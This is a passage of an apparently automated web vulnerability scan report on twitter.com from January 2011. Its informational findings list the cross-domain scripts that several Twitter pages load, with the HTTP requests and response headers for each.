<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/dismissable.js?1295915292" type="text/javascript"></script>
...[SNIP]...

21.473. http://twitter.com/goodies/tweetbutton previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/goodies/tweetbutton

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295915292
http://a0.twimg.com/a/1295903943/javascripts/tweet_button.js?1295915292
http://a1.twimg.com/a/1295903943/javascripts/api.js?1295915292
http://a2.twimg.com/a/1295903943/javascripts/layout_newtwitter.js?1295915292
http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915292
http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915292
http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292
http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295915292
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /goodies/tweetbutton HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964101-18603-26081
ETag: "a82d62223df18c75e7f04c910709daa8"
Last-Modified: Tue, 25 Jan 2011 14:01:41 GMT
X-Runtime: 0.06782
Content-Type: text/html; charset=utf-8
Content-Length: 16931
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964099762702; path=/; expires=Tue, 01-Feb-11 14:01:39 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596410159981042; path=/; expires=Thu, 24 Feb 2011 14:01:41 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlZTQ5NjQzODBhYWVkYzk2ZTk5YjBhZjc3Y2QzY2My%250AYjM6B2lkIiU1ZDJiYjViZjBmZjlhM2RiYmM3MDI4ODNjZDI3ZDY5YSIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCOHber0tAQ%253D%253D--6ec643070f608b03d4f820e3f2adac7676f7a3ca; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915292" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295915292" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/api.js?1295915292" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/layout_newtwitter.js?1295915292" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://a0.twimg.com/a/1295903943/javascripts/tweet_button.js?1295915292" type="text/javascript"></script>
...[SNIP]...

21.474. http://twitter.com/joomla previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/joomla

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295652732
http://a1.twimg.com/a/1295646587/javascripts/dismissable.js?1295652732
http://a1.twimg.com/a/1295646587/javascripts/geov1.js?1295652732
http://a1.twimg.com/a/1295646587/javascripts/twitter.js?1295652732
http://a3.twimg.com/a/1295646587/javascripts/api.js?1295652732
http://a3.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295652732
http://a3.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295652732
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /joomla HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295884958-68881-31789
ETag: "ae3f2c47aa619b0820a141db6a6acfae"
Last-Modified: Mon, 24 Jan 2011 16:02:38 GMT
X-Runtime: 0.01322
Content-Type: text/html; charset=utf-8
Content-Length: 53726
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295884958395114; path=/; expires=Mon, 31-Jan-11 16:02:38 GMT; domain=.twitter.com
Set-Cookie: guest_id=129588495844059611; path=/; expires=Wed, 23 Feb 2011 16:02:38 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCOo6w7gtAToHaWQiJTFmN2YyYzU0MmRhYmY4%250AZWYyNDc4ZWFmY2M4MmYwNjIwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--724d5a6fe81e3fe03c41751c53520bd5bc139e61; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/twitter.js?1295652732" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295652732" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295652732" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295652732" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/geov1.js?1295652732" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/api.js?1295652732" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295652732" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/dismissable.js?1295652732" type="text/javascript"></script>
...[SNIP]...

21.475. http://twitter.com/kontentdesign previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/kontentdesign

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295903943/javascripts/dismissable.js?1295916547
http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295916547
http://a2.twimg.com/a/1295903943/javascripts/api.js?1295916547
http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295916547
http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295916547
http://a3.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295916547
http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295916547
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /kontentdesign HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:02:07 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964127-50745-17441
ETag: "63815a5d05a1b95386102d34a0650082"
Last-Modified: Tue, 25 Jan 2011 14:02:07 GMT
X-Runtime: 0.01446
Content-Type: text/html; charset=utf-8
Content-Length: 52448
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964125413234; path=/; expires=Tue, 01-Feb-11 14:02:05 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596412736246980; path=/; expires=Thu, 24 Feb 2011 14:02:07 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTcyODA1NmExZmQ1MDE5ZTUzYjYyYjQ0NjQzMDVjYjkxIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIhEB7vS0B--951e0307ecaa4357ec02a6a302e57cf685286962; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295916547" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295916547" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295916547" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295916547" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295916547" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/api.js?1295916547" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295916547" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/dismissable.js?1295916547" type="text/javascript"></script>
...[SNIP]...

21.476. http://twitter.com/nbc/primetime previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/nbc/primetime

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295646587/javascripts/api.js?1295901448
http://a0.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295901448
http://a0.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295901448
http://a1.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295901448
http://a1.twimg.com/a/1295646587/javascripts/twitter.js?1295901448
http://a2.twimg.com/a/1295646587/javascripts/geov1.js?1295901448
http://a2.twimg.com/a/1295646587/javascripts/lists.js?1295901448
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /nbc/primetime HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:06:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910418-13129-32425
ETag: "a5a44db8a71fab6b9f2580b61e51bac4"
Last-Modified: Mon, 24 Jan 2011 23:06:58 GMT
X-Runtime: 0.49830
Content-Type: text/html; charset=utf-8
Content-Length: 57012
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910418725856; path=/; expires=Mon, 31-Jan-11 23:06:58 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591041889118308; path=/; expires=Wed, 23 Feb 2011 23:06:58 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYWNhY2QyMDk5NWYxMWM2MjRjNGQ0NDdhYTA1ZTQ3%250AYzA6DnJldHVybl90byIlaHR0cDovL3R3aXR0ZXIuY29tL25iYy9wcmltZXRp%250AbWU6B2lkIiU0NDZjYzZhOTY2NmJmZTZlZjQ3OGQ5ZGIyYmQxYzRiMCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCM25R7otAQ%253D%253D--d1e94695604015df0d84f87d3e421b29e16e392e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/twitter.js?1295901448" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295901448" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295901448" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295901448" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/geov1.js?1295901448" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/api.js?1295901448" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lists.js?1295901448" type="text/javascript"></script>
...[SNIP]...

21.477. http://twitter.com/netlingo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/netlingo

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915883
http://a0.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915883
http://a1.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915883
http://a1.twimg.com/a/1295903943/javascripts/twitter.js?1295915883
http://a2.twimg.com/a/1295903943/javascripts/dismissable.js?1295915883
http://a2.twimg.com/a/1295903943/javascripts/geov1.js?1295915883
http://a3.twimg.com/a/1295903943/javascripts/api.js?1295915883
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /netlingo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:02:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964123-67769-3429
ETag: "8ed7c55c146db619fdf925948244e6a4"
Last-Modified: Tue, 25 Jan 2011 14:02:03 GMT
X-Runtime: 0.57870
Content-Type: text/html; charset=utf-8
Content-Length: 48756
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964121273602; path=/; expires=Tue, 01-Feb-11 14:02:01 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596412316680845; path=/; expires=Thu, 24 Feb 2011 14:02:03 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlNGZlYmY1Yjc5NTA0ZjkwYmIwMWI5OGEyZDMyZTM1%250AYjk6DnJldHVybl90byIgaHR0cDovL3R3aXR0ZXIuY29tL25ldGxpbmdvOgdp%250AZCIlNDAzOGVkNGRhYjIyMmJkOGY3ZGY1YjQzNjEzOWM1MDciCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgfMHu9LQE%253D--a495d11ca78d3b4eafce746e4006ed9d057939a8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/twitter.js?1295915883" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915883" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915883" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915883" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/geov1.js?1295915883" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/api.js?1295915883" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915883" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/dismissable.js?1295915883" type="text/javascript"></script>
...[SNIP]...

21.478. http://twitter.com/nickhalstead/status/15837113167 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/nickhalstead/status/15837113167

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295915292
http://a1.twimg.com/a/1295903943/javascripts/api.js?1295915292
http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915292
http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915292
http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292
http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295915292
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /nickhalstead/status/15837113167 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964112-46984-37079
ETag: "2a3e1a1864a58dc8b2d4201a204ff2c5"
Last-Modified: Tue, 25 Jan 2011 14:01:52 GMT
X-Runtime: 0.05636
Content-Type: text/html; charset=utf-8
Content-Length: 13650
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964110102891; path=/; expires=Tue, 01-Feb-11 14:01:50 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596411225932495; path=/; expires=Thu, 24 Feb 2011 14:01:52 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlMTk2NDYwNmQ5MTBjYjNlYWEzY2UzYzZiOGE3MDQ5%250ANmI6DnJldHVybl90byI3aHR0cDovL3R3aXR0ZXIuY29tL25pY2toYWxzdGVh%250AZC9zdGF0dXMvMTU4MzcxMTMxNjc6B2lkIiViZDVjNTFmMjJhOThkNmZmODRl%250AMDVlOTAyNGUyNzJhNyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCIUFe70t%250AAQ%253D%253D--67c44ee9e15f6c0fbae20d582963e29eb03333df; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915292" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295915292" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/api.js?1295915292" type="text/javascript"></script>
...[SNIP]...

21.479. http://twitter.com/spies_assassins previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/spies_assassins

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295903943/javascripts/dismissable.js?1295916547
http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295916547
http://a2.twimg.com/a/1295903943/javascripts/api.js?1295916547
http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295916547
http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295916547
http://a3.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295916547
http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295916547
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /spies_assassins HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:07 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964066-9198-19132
ETag: "d25862c279dba6cd1e553cac20d22d67"
Last-Modified: Tue, 25 Jan 2011 14:01:06 GMT
X-Runtime: 0.81721
Content-Type: text/html; charset=utf-8
Content-Length: 53400
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964064205570; path=/; expires=Tue, 01-Feb-11 14:01:04 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596406668777691; path=/; expires=Thu, 24 Feb 2011 14:01:06 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlOTFhMjVhMGYxN2MzNTI1ZTQ5ZmUzZjczMmNkZjE3%250AMjc6DnJldHVybl90byInaHR0cDovL3R3aXR0ZXIuY29tL3NwaWVzX2Fzc2Fz%250Ac2luczoHaWQiJTYzMTVlMzExN2JlZWI3ZTk3NzRhNmY4YzVlZGMxZGFhIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIgVN6vS0B--19cfe0462f0d48cd362b4b7b652a3c4766f21675; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295916547" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295916547" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295916547" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295916547" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295916547" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/api.js?1295916547" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295916547" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/dismissable.js?1295916547" type="text/javascript"></script>
...[SNIP]...

21.480. http://twitter.com/tweetmeme previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/tweetmeme

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915883
http://a0.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915883
http://a1.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915883
http://a1.twimg.com/a/1295903943/javascripts/twitter.js?1295915883
http://a2.twimg.com/a/1295903943/javascripts/dismissable.js?1295915883
http://a2.twimg.com/a/1295903943/javascripts/geov1.js?1295915883
http://a3.twimg.com/a/1295903943/javascripts/api.js?1295915883
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /tweetmeme HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:06 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964066-9478-51270
ETag: "7b585adb867e3eb6f32095f5c2866375"
Last-Modified: Tue, 25 Jan 2011 14:01:06 GMT
X-Runtime: 0.01836
Content-Type: text/html; charset=utf-8
Content-Length: 53983
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964064200831; path=/; expires=Tue, 01-Feb-11 14:01:04 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596406693798147; path=/; expires=Thu, 24 Feb 2011 14:01:06 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTJkNDc2OWNmNTUxYTAyZGE3OGM1MDcyNjFlYTA4NWNjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIfFR6vS0B--e1050b38818ecc596cfa97ed5bb62afd0749dcd8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/twitter.js?1295915883" type="text/javascript"></script>
